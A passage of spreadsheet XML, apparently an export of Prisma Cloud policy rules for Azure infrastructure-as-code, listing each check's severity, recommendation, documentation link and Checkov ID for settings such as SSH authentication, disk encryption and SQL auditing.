      <c r="M900" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N900" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O900" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P900" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q900" t="inlineStr"/>
      <c r="R900" t="inlineStr"/>
      <c r="S900" t="inlineStr"/>
      <c r="T900" t="b">
        <v>0</v>
      </c>
      <c r="U900" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V900" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W900" t="inlineStr">
        <is>
          <t>Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)</t>
        </is>
      </c>
      <c r="X900" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13</t>
        </is>
      </c>
      <c r="Y900" t="inlineStr"/>
      <c r="Z900" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA900" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB900" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC900" t="inlineStr">
        <is>
          <t>CKV_AZURE_49</t>
        </is>
      </c>
      <c r="AD900" t="b">
        <v>1</v>
      </c>
      <c r="AE900" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF900" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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0" t="inlineStr">
        <is>
          <t>f948bf8a-0baf-40a1-8d76-8ac63c613243</t>
        </is>
      </c>
      <c r="AI900" t="inlineStr"/>
      <c r="AJ900" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK900" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" t="inlineStr"/>
      <c r="B901" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C901" s="2" t="inlineStr"/>
      <c r="D901" t="inlineStr"/>
      <c r="E901" t="inlineStr"/>
      <c r="F901" t="inlineStr"/>
      <c r="G901" t="b">
        <v>1</v>
      </c>
      <c r="H9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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J901" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K901" t="inlineStr">
        <is>
          <t>Virtual machine scale sets do not have encryption at host enabled</t>
        </is>
      </c>
      <c r="L901" t="inlineStr"/>
      <c r="M901" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N901" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O901" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P901" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q901" t="inlineStr"/>
      <c r="R901" t="inlineStr"/>
      <c r="S901" t="inlineStr"/>
      <c r="T901" t="b">
        <v>0</v>
      </c>
      <c r="U901" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V901" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-virtual-machine-scale-set,azure-windows-virtual-machine-scale-set</t>
        </is>
      </c>
      <c r="W901" t="inlineStr">
        <is>
          <t>Ensure that Virtual machine scale sets have encryption at host enabled</t>
        </is>
      </c>
      <c r="X901" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled</t>
        </is>
      </c>
      <c r="Y901" t="inlineStr"/>
      <c r="Z901" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_virtual_machine_scale_set","azurerm_windows_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA901" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB901" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC901" t="inlineStr">
        <is>
          <t>CKV_AZURE_97</t>
        </is>
      </c>
      <c r="AD901" t="b">
        <v>1</v>
      </c>
      <c r="AE901" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF901" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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1" t="inlineStr">
        <is>
          <t>eb556c1a-e906-4172-a30f-8c342fc7e4c3</t>
        </is>
      </c>
      <c r="AI901" t="inlineStr"/>
      <c r="AJ901" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK901" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" t="inlineStr"/>
      <c r="B902" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C902" s="2" t="inlineStr"/>
      <c r="D902" t="inlineStr"/>
      <c r="E902" t="inlineStr"/>
      <c r="F902" t="inlineStr"/>
      <c r="G902" t="b">
        <v>1</v>
      </c>
      <c r="H9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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J902" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux</t>
        </is>
      </c>
      <c r="K902" t="inlineStr">
        <is>
          <t>Azure App Service Not Always On</t>
        </is>
      </c>
      <c r="L902" t="inlineStr"/>
      <c r="M902" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N902" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O902" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P902" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q902" t="inlineStr"/>
      <c r="R902" t="inlineStr"/>
      <c r="S902" t="inlineStr"/>
      <c r="T902" t="b">
        <v>0</v>
      </c>
      <c r="U902" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V902" t="inlineStr">
        <is>
          <t>IaC:General:azure-linux-web-app,azure-windows-web-app</t>
        </is>
      </c>
      <c r="W902" t="inlineStr">
        <is>
          <t>Ensure App Service is set to be always on</t>
        </is>
      </c>
      <c r="X902" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-general-policies/azr-general-214</t>
        </is>
      </c>
      <c r="Y902" t="inlineStr"/>
      <c r="Z902" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_linux_web_app","azurerm_windows_web_app"]}</t>
        </is>
      </c>
      <c r="AA902" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB902" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC902" t="inlineStr">
        <is>
          <t>CKV_AZURE_214</t>
        </is>
      </c>
      <c r="AD902" t="b">
        <v>1</v>
      </c>
      <c r="AE902" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF902" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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2" t="inlineStr">
        <is>
          <t>9385515d-f8a7-4463-8a11-2b5d8740a402</t>
        </is>
      </c>
      <c r="AI902" t="inlineStr"/>
      <c r="AJ902" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK902" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" t="inlineStr"/>
      <c r="B903" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C903" s="2" t="inlineStr"/>
      <c r="D903" t="inlineStr"/>
      <c r="E903" t="inlineStr"/>
      <c r="F903" t="inlineStr"/>
      <c r="G903" t="b">
        <v>1</v>
      </c>
      <c r="H9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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J903" t="inlineStr">
        <is>
          <t>IaC:General:azure-machine</t>
        </is>
      </c>
      <c r="K903" t="inlineStr">
        <is>
          <t>Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0</t>
        </is>
      </c>
      <c r="L903" t="inlineStr"/>
      <c r="M903" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N903" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O903" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P903" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q903" t="inlineStr"/>
      <c r="R903" t="inlineStr"/>
      <c r="S903" t="inlineStr"/>
      <c r="T903" t="b">
        <v>0</v>
      </c>
      <c r="U903" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V903" t="inlineStr">
        <is>
          <t>IaC:General:azure-machine-learning-compute-cluster</t>
        </is>
      </c>
      <c r="W903" t="inlineStr">
        <is>
          <t>Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0</t>
        </is>
      </c>
      <c r="X903" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0</t>
        </is>
      </c>
      <c r="Y903" t="inlineStr"/>
      <c r="Z903" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_machine_learning_compute_cluster"]}</t>
        </is>
      </c>
      <c r="AA903" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB903" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC903" t="inlineStr">
        <is>
          <t>CKV_AZURE_150</t>
        </is>
      </c>
      <c r="AD903" t="b">
        <v>1</v>
      </c>
      <c r="AE903" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF903" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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3" t="inlineStr">
        <is>
          <t>0199900b-03d9-4dc3-9d6b-272289f74a57</t>
        </is>
      </c>
      <c r="AI903" t="inlineStr"/>
      <c r="AJ903" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK903" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" t="inlineStr"/>
      <c r="B904" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C904" s="2" t="inlineStr"/>
      <c r="D904" t="inlineStr"/>
      <c r="E904" t="inlineStr"/>
      <c r="F904" t="inlineStr"/>
      <c r="G904" t="b">
        <v>1</v>
      </c>
      <c r="H9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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J904" t="inlineStr">
        <is>
          <t>IaC:General:azure-managed</t>
        </is>
      </c>
      <c r="K904" t="inlineStr">
        <is>
          <t>Azure VM data disk is not encrypted with ADE/CMK</t>
        </is>
      </c>
      <c r="L904" t="inlineStr"/>
      <c r="M904" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N904" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O904" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P904" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q904" t="inlineStr"/>
      <c r="R904" t="inlineStr"/>
      <c r="S904" t="inlineStr"/>
      <c r="T904" t="b">
        <v>0</v>
      </c>
      <c r="U904" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V904" t="inlineStr">
        <is>
          <t>IaC:General:azure-managed-disk</t>
        </is>
      </c>
      <c r="W904" t="inlineStr">
        <is>
          <t>Ensure Azure managed disk has encryption enabled</t>
        </is>
      </c>
      <c r="X904" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1</t>
        </is>
      </c>
      <c r="Y904" t="inlineStr"/>
      <c r="Z904" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_managed_disk"]}</t>
        </is>
      </c>
      <c r="AA904" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB904" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC904" t="inlineStr">
        <is>
          <t>CKV_AZURE_2</t>
        </is>
      </c>
      <c r="AD904" t="b">
        <v>1</v>
      </c>
      <c r="AE904" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF904" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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4" t="inlineStr">
        <is>
          <t>564c3bcd-7b29-4e6a-9da9-e929876a9f1f</t>
        </is>
      </c>
      <c r="AI904" t="inlineStr"/>
      <c r="AJ904" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK904" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" t="inlineStr"/>
      <c r="B905" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C905" s="2" t="inlineStr"/>
      <c r="D905" t="inlineStr"/>
      <c r="E905" t="inlineStr"/>
      <c r="F905" t="inlineStr"/>
      <c r="G905" t="b">
        <v>1</v>
      </c>
      <c r="H9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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J905" t="inlineStr">
        <is>
          <t>IaC:General:azure-managed</t>
        </is>
      </c>
      <c r="K905" t="inlineStr">
        <is>
          <t>Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption</t>
        </is>
      </c>
      <c r="L905" t="inlineStr"/>
      <c r="M905" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N905" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O905" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P905" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q905" t="inlineStr"/>
      <c r="R905" t="inlineStr"/>
      <c r="S905" t="inlineStr"/>
      <c r="T905" t="b">
        <v>0</v>
      </c>
      <c r="U905" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V905" t="inlineStr">
        <is>
          <t>IaC:General:azure-managed-disk</t>
        </is>
      </c>
      <c r="W905" t="inlineStr">
        <is>
          <t>Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption</t>
        </is>
      </c>
      <c r="X905" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption</t>
        </is>
      </c>
      <c r="Y905" t="inlineStr"/>
      <c r="Z905" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_managed_disk"]}</t>
        </is>
      </c>
      <c r="AA905" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB905" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC905" t="inlineStr">
        <is>
          <t>CKV_AZURE_93</t>
        </is>
      </c>
      <c r="AD905" t="b">
        <v>1</v>
      </c>
      <c r="AE905" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF905" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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5" t="inlineStr">
        <is>
          <t>dd3f21d1-4b56-4a6d-a4ad-58b126d2791b</t>
        </is>
      </c>
      <c r="AI905" t="inlineStr"/>
      <c r="AJ905" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK905" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" t="inlineStr"/>
      <c r="B906" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C906" s="2" t="inlineStr"/>
      <c r="D906" t="inlineStr"/>
      <c r="E906" t="inlineStr"/>
      <c r="F906" t="inlineStr"/>
      <c r="G906" t="b">
        <v>1</v>
      </c>
      <c r="H9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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J906" t="inlineStr">
        <is>
          <t>IaC:General:azure-mariadb</t>
        </is>
      </c>
      <c r="K906" t="inlineStr">
        <is>
          <t>MariaDB server does not enable geo-redundant backups</t>
        </is>
      </c>
      <c r="L906" t="inlineStr"/>
      <c r="M906" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N906" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O906" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P906" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q906" t="inlineStr"/>
      <c r="R906" t="inlineStr"/>
      <c r="S906" t="inlineStr"/>
      <c r="T906" t="b">
        <v>0</v>
      </c>
      <c r="U906" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V906" t="inlineStr">
        <is>
          <t>IaC:General:azure-mariadb-server</t>
        </is>
      </c>
      <c r="W906" t="inlineStr">
        <is>
          <t>Ensure that MariaDB server enables geo-redundant backups</t>
        </is>
      </c>
      <c r="X906" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-mariadb-server-enables-geo-redundant-backups</t>
        </is>
      </c>
      <c r="Y906" t="inlineStr"/>
      <c r="Z906" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mariadb_server"]}</t>
        </is>
      </c>
      <c r="AA906" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB906" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC906" t="inlineStr">
        <is>
          <t>CKV_AZURE_129</t>
        </is>
      </c>
      <c r="AD906" t="b">
        <v>1</v>
      </c>
      <c r="AE906" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF906" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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6" t="inlineStr">
        <is>
          <t>2bd10e93-cbe7-4224-98bd-6fb5472d5418</t>
        </is>
      </c>
      <c r="AI906" t="inlineStr"/>
      <c r="AJ906" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK906" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" t="inlineStr"/>
      <c r="B907" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C907" s="2" t="inlineStr"/>
      <c r="D907" t="inlineStr"/>
      <c r="E907" t="inlineStr"/>
      <c r="F907" t="inlineStr"/>
      <c r="G907" t="b">
        <v>1</v>
      </c>
      <c r="H9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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J907" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K907" t="inlineStr">
        <is>
          <t>Azure SQL Server does not have default auditing policy configured</t>
        </is>
      </c>
      <c r="L907" t="inlineStr"/>
      <c r="M907" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N907" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O907" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P907" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q907" t="inlineStr"/>
      <c r="R907" t="inlineStr"/>
      <c r="S907" t="inlineStr"/>
      <c r="T907" t="b">
        <v>0</v>
      </c>
      <c r="U907" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V907" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-database-extended-auditing-policy</t>
        </is>
      </c>
      <c r="W907" t="inlineStr">
        <is>
          <t>Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs</t>
        </is>
      </c>
      <c r="X907" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured</t>
        </is>
      </c>
      <c r="Y907" t="inlineStr"/>
      <c r="Z907" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_database_extended_auditing_policy"]}</t>
        </is>
      </c>
      <c r="AA907" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB907" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC907" t="inlineStr">
        <is>
          <t>CKV_AZURE_156</t>
        </is>
      </c>
      <c r="AD907" t="b">
        <v>1</v>
      </c>
      <c r="AE907" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF907" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>8b72f2db-1338-4575-9a05-59bcced0e34b</t>
        </is>
      </c>
      <c r="AI907" t="inlineStr"/>
      <c r="AJ907" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK907" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" t="inlineStr"/>
      <c r="B908" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C908" s="2" t="inlineStr"/>
      <c r="D908" t="inlineStr"/>
      <c r="E908" t="inlineStr"/>
      <c r="F908" t="inlineStr"/>
      <c r="G908" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J908" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K908" t="inlineStr">
        <is>
          <t>Azure SQL Server auditing policy is disabled</t>
        </is>
      </c>
      <c r="L908" t="inlineStr"/>
      <c r="M908" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N908" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O908" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P908" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q908" t="inlineStr"/>
      <c r="R908" t="inlineStr"/>
      <c r="S908" t="inlineStr"/>
      <c r="T908" t="b">
        <v>0</v>
      </c>
      <c r="U908" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V908" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-server,azure-sql-server</t>
        </is>
      </c>
      <c r="W908" t="inlineStr">
        <is>
          <t>Ensure that 'Auditing' is set to 'On' for SQL servers</t>
        </is>
      </c>
      <c r="X908" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2</t>
        </is>
      </c>
      <c r="Y908" t="inlineStr"/>
      <c r="Z908" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server", "azurerm_sql_server"]}</t>
        </is>
      </c>
      <c r="AA908" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB908" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC908" t="inlineStr">
        <is>
          <t>CKV_AZURE_23</t>
        </is>
      </c>
      <c r="AD908" t="b">
        <v>1</v>
      </c>
      <c r="AE908" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF908" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>8a97eb53-4a04-45d6-9f2d-af3b7eb8317b</t>
        </is>
      </c>
      <c r="AI908" t="inlineStr"/>
      <c r="AJ908" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK908" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" t="inlineStr"/>
      <c r="B909" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C909" s="2" t="inlineStr"/>
      <c r="D909" t="inlineStr"/>
      <c r="E909" t="inlineStr"/>
      <c r="F909" t="inlineStr"/>
      <c r="G909" t="b">
        <v>1</v>
      </c>
      <c r="H9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09" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J909" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K909" t="inlineStr">
        <is>
          <t>Azure SQL Server threat detection alerts are not enabled for all threat types</t>
        </is>
      </c>
      <c r="L909" t="inlineStr"/>
      <c r="M909" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N909" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O909" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P909" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q909" t="inlineStr"/>
      <c r="R909" t="inlineStr"/>
      <c r="S909" t="inlineStr"/>
      <c r="T909" t="b">
        <v>0</v>
      </c>
      <c r="U909" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V909" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql-server-security-alert-policy</t>
        </is>
      </c>
      <c r="W909" t="inlineStr">
        <is>
          <t>Azure SQL Server threat detection alerts are not enabled for all threat types</t>
        </is>
      </c>
      <c r="X909" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6</t>
        </is>
      </c>
      <c r="Y909" t="inlineStr"/>
      <c r="Z909" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy"]}</t>
        </is>
      </c>
      <c r="AA909" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB909" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC909" t="inlineStr">
        <is>
          <t>CKV_AZURE_25</t>
        </is>
      </c>
      <c r="AD909" t="b">
        <v>1</v>
      </c>
      <c r="AE909" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF909" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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09" t="inlineStr">
        <is>
          <t>cb84d42b-5935-4c37-a769-b2ec6c4c7995</t>
        </is>
      </c>
      <c r="AI909" t="inlineStr"/>
      <c r="AJ909" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK909" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" t="inlineStr"/>
      <c r="B910" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C910" s="2" t="inlineStr"/>
      <c r="D910" t="inlineStr"/>
      <c r="E910" t="inlineStr"/>
      <c r="F910" t="inlineStr"/>
      <c r="G910" t="b">
        <v>1</v>
      </c>
      <c r="H9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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J910" t="inlineStr">
        <is>
          <t>IaC:General:azure-mssql</t>
        </is>
      </c>
      <c r="K910" t="inlineStr">
        <is>
          <t>Azure SQL server send alerts to field value is not set</t>
        </is>
      </c>
      <c r="L910" t="inlineStr"/>
      <c r="M910" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N910" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O910" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P910" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q910" t="inlineStr"/>
      <c r="R910" t="inlineStr"/>
      <c r="S910" t="inlineStr"/>
      <c r="T910" t="b">
        <v>0</v>
      </c>
      <c r="U910" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V910" t="inlineStr">
        <is>
